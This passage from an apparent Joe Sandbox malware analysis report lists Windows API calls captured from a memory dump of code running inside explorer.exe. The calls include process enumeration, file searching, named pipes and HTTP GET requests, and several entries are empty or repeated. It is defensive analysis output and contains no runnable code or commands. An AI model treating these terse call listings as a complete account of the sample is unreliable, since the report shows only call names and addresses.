                                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32 ref: 00F225AA
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225B8
                                                                                                                                                                                                                                                    • Part of subcall function 00F2C704: NtDelayExecution.NTDLL ref: 00F2C726
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225C6
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225D4
                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32 ref: 00F225E2
                                                                                                                                                                                                                                                    • Part of subcall function 00F282B4: NtFreeVirtualMemory.NTDLL ref: 00F282E5
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Handle$Pipe$CloseCreate$InformationProcess$FileMemoryNamedPeekReadVirtual$AllocateCodeDelayExecutionExitFreeTerminate
                                                                                                                                                                                                                                                  • String ID: h
                                                                                                                                                                                                                                                  • API String ID: 30365702-2439710439
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateFileInitStringUnicode
                                                                                                                                                                                                                                                  • String ID: 0$@
                                                                                                                                                                                                                                                  • API String ID: 2498367268-1545510068
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                    • Part of subcall function 00F2B388: NtAllocateVirtualMemory.NTDLL ref: 00F2B3BE
                                                                                                                                                                                                                                                  • FindFirstFileA.KERNEL32 ref: 00F22BE7
                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 00F22CAD
                                                                                                                                                                                                                                                  • FindNextFileA.KERNEL32 ref: 00F22CDA
                                                                                                                                                                                                                                                  • FindClose.KERNEL32 ref: 00F22CED
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Find$File$AllocateCloseFirstMemoryNextVirtualwsprintf
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 65906682-0
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$ConnectHttpOpenRequest
                                                                                                                                                                                                                                                  • String ID: GET
                                                                                                                                                                                                                                                  • API String ID: 830097650-1805413626
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32$FirstNext$wsprintf$AllocateCloseCreateHandleMemorySnapshotToolhelp32Virtual
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 3605396869-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: File$View$CloseCreateFreeHandleMappingUnmapVirtual
                                                                                                                                                                                                                                                  • String ID: @
                                                                                                                                                                                                                                                  • API String ID: 1610889594-2766056989
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 4137211488-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: Internet$CloseHandle$Open
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2762225225-0
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000009.00000002.3799416128.0000000000F20000.00000040.00000001.00020000.00000000.sdmp, Offset: 00F20000, based on PE: true
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_9_2_f20000_explorer.jbxd
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CloseHandlewsprintf$CreateProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 2803068115-0